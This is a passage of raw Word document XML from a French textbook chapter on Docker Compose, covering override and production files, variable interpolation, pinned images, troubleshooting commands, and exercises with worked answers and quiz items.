              <w:t>compose.yaml</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Définition commune</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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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compose.override.yaml</w:t>
            </w:r>
          </w:p>
        </w:tc>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Surcharge locale</w:t>
            </w:r>
          </w:p>
        </w:tc>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Oui, mais générique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>compose.prod.yaml</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Production</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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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.env</w:t>
            </w:r>
          </w:p>
        </w:tc>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Variables locales</w:t>
            </w:r>
          </w:p>
        </w:tc>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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3094"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.env.example</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Modèle documenté</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r>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux notations utiles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Variables dans le fichier</w:t>
        <w:br/>
        <w:t>environment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  LOG_LEVEL: ${LOG_LEVEL:-info}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  DATABASE_URL: ${DATABASE_URL:?DATABASE_URL requise}</w:t>
        <w:br/>
        <w:br/>
        <w:t># Interpolation depuis .env</w:t>
        <w:br/>
        <w:t># .env</w:t>
        <w:br/>
        <w:t># LOG_LEVEL=debug</w:t>
        <w:br/>
        <w:t># DATABASE_URL=postgres://app:secret@db:5432/app</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>65.4 Construire ou utiliser une image</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>En développement, la construction locale évite de publier une image à chaque modification. En production, une image publiée et épinglée garantit que l'artefact testé est celui déployé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux configurations distinctes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Développement : construire localement</w:t>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  api:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    build: .</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: mon-api:dev</w:t>
        <w:br/>
        <w:br/>
        <w:t># Production : utiliser une image publiée, épinglée</w:t>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  api:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: registry.exemple.fr/equipe/app:1.4.2@sha256:9a8b7c...</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ne pas mélanger les deux pour un même service</w:t>
        <w:br/>
        <w:t># en production : `build` doit être absent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un fichier Compose de production qui contient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> finit toujours par déployer une construction locale non testée. Séparez explicitement les fichiers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois vérifications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Vérifier la configuration effective avant de démarrer</w:t>
        <w:br/>
        <w:t>docker compose config</w:t>
        <w:br/>
        <w:br/>
        <w:t># Voir la configuration avec les variables résolues</w:t>
        <w:br/>
        <w:t>docker compose config --quiet &amp;&amp; echo "syntaxe valide"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Lister les images utilisées</w:t>
        <w:br/>
        <w:t>docker compose images</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>65.5 Diagnostiquer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un service qui ne démarre pas sous Compose a cinq causes fréquentes. La lecture ordonnée des journaux et de l'état permet de trancher rapidement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.237 — Six symptômes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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>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Cause</w:t>
            </w:r>
          </w:p>
        </w:tc>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Vérification</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Conteneur </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>exited (1)</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Erreur applicative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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unhealthy</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Vérification trop stricte</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healthcheck</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>port is already allocated</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Port occupé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ss -ltnp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="300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dependency failed</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depends_on</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> impossible</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ps -a</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Données perdues</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Volume mal nommé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>volumes:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Variables vides</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.env</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> absent</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compose config</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre commandes de diagnostic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docker compose ps -a</w:t>
        <w:br/>
        <w:t>docker compose logs --tail=50 --no-log-prefix api</w:t>
        <w:br/>
        <w:t>docker compose config</w:t>
        <w:br/>
        <w:t>docker inspect $(docker compose ps -q api) --format '{{.State.ExitCode}}'</w:t>
      </w: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LA VÉRIFICATION DE SANTÉ DOIT ÊTRE SIMPLE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>healthcheck</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> qui interroge toutes les dépendances rend un service « unhealthy » dès qu'une dépendance secondaire ralentit. Testez le service lui-même, et distinguez vivacité et capacité.</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AVANT DE PARTAGER UN FICHIER COMPOSE</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docker compose config</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> passe sans avertissement.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Aucun secret en clair dans le fichier.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Volumes nommés pour les données persistantes.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Vérifications de santé sur les services dépendants.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Ports publiés uniquement sur </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>127.0.0.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> en développement.</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Compose décrit services, réseaux et volumes dans un fichier versionné.</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depends_on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> seul n'attend pas que le service soit prêt.</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down -v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> supprime les volumes et donc les données.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fichiers de surcharge évitent la duplication.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profils limitent le démarrage des outils aux besoins.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La production utilise une image épinglée, jamais </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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compose config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> valide et révèle les variables résolues.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port déjà occupé est une cause fréquente d'échec.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une machine suffit pour Compose. À l'échelle d'un cluster, il faut un orchestrateur : Kubernetes.</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65.1 — Écrire un Compose à trois services</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Une API, une base et un cache doivent démarrer ensemble.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Ordonnez le démarrage.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Ajoutez les vérifications.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Ne publiez que l'API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 65.2 — Séparer développement et production</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Le fichier local monte les sources, la production utilise une image.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Écrivez la base.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Ajoutez une surcharge de développement.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Ajoutez un fichier de production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 65.3 — Diagnostiquer un service unhealthy</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 xml:space="preserve">L'API est </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>unhealthy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> alors que le conteneur tourne.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Lisez la sortie de la vérification.</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Testez manuellement.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Ajustez la vérification.</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65.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  api:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    build: .</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ports: ["127.0.0.1:8080:3000"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    environment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      DATABASE_URL: postgres://app:secret@db:5432/app</w:t>
        <w:br/>
        <w:t xml:space="preserve">      REDIS_URL: redis://cache:6379</w:t>
        <w:br/>
        <w:t xml:space="preserve">    depends_on:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      db: { condition: service_healthy }</w:t>
        <w:br/>
        <w:t xml:space="preserve">      cache: { condition: service_started }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  db:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: postgres:16-alpine</w:t>
        <w:br/>
        <w:t xml:space="preserve">    environment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      POSTGRES_USER: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">      POSTGRES_PASSWORD: secret</w:t>
        <w:br/>
        <w:t xml:space="preserve">      POSTGRES_DB: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    volumes: ["pgdata:/var/lib/postgresql/data"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    healthcheck:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      test: ["CMD-SHELL", "pg_isready -U app -d app"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">      interval: 5s</w:t>
        <w:br/>
        <w:t xml:space="preserve">      retries: 10</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  cache:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: redis:7-alpine</w:t>
        <w:br/>
        <w:br/>
        <w:t>volumes:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  pgdata:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>condition: service_healthy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> évite que l'API démarre avant que la base accepte les connexions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cache n'a pas besoin d'une vérification : Redis démarre assez vite pour que l'API gère une reconnexion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 65.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t># compose.yaml</w:t>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  api:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: registry.exemple.fr/equipe/app:1.4.2</w:t>
        <w:br/>
        <w:t xml:space="preserve">    environment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      LOG_LEVEL: ${LOG_LEVEL:-info}</w:t>
        <w:br/>
        <w:br/>
        <w:t># compose.override.yaml (développement, automatique)</w:t>
        <w:br/>
        <w:t>services:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  api:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    build: .</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: mon-api:dev</w:t>
        <w:br/>
        <w:t xml:space="preserve">    volumes: ["./src:/app/src"]</w:t>
        <w:br/>
        <w:t xml:space="preserve">    environment:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      LOG_LEVEL: debug</w:t>
        <w:br/>
        <w:t xml:space="preserve">    command: ["npm", "run", "dev"]</w:t>
        <w:br/>
        <w:br/>
        <w:t># Production</w:t>
        <w:br/>
        <w:t>docker compose -f compose.yaml up -d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En développement, Compose applique automatiquement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>compose.override.yaml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>En production, on fournit seulement le fichier de base : l'image épinglée est utilisée telle quelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 65.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>docker inspect $(docker compose ps -q api) \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --format '{{json .State.Health}}'</w:t>
        <w:br/>
        <w:br/>
        <w:t>docker compose exec api wget -qO- http://127.0.0.1:3000/health</w:t>
        <w:br/>
        <w:t>docker compose logs api | tail -30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La sortie de la vérification est conservée dans l'état de santé : elle indique souvent un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>connection refused</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> immédiat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Un délai de démarrage insuffisant se corrige avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>start_period</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, pas en allongeant indéfiniment les intervalles.</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>depends_on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sans condition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Attend la santé du service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Démarre dans l'ordre sans attendre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Crée un réseau</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Publie un port</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Quelle commande supprime les volumes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down</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down -v</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stop</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restart</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Quel fichier est appliqué automatiquement en développement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compose.prod.yaml</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compose.override.yaml</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.env</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Dockerfile</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 xml:space="preserve">Pourquoi ne pas laisser </w:t>
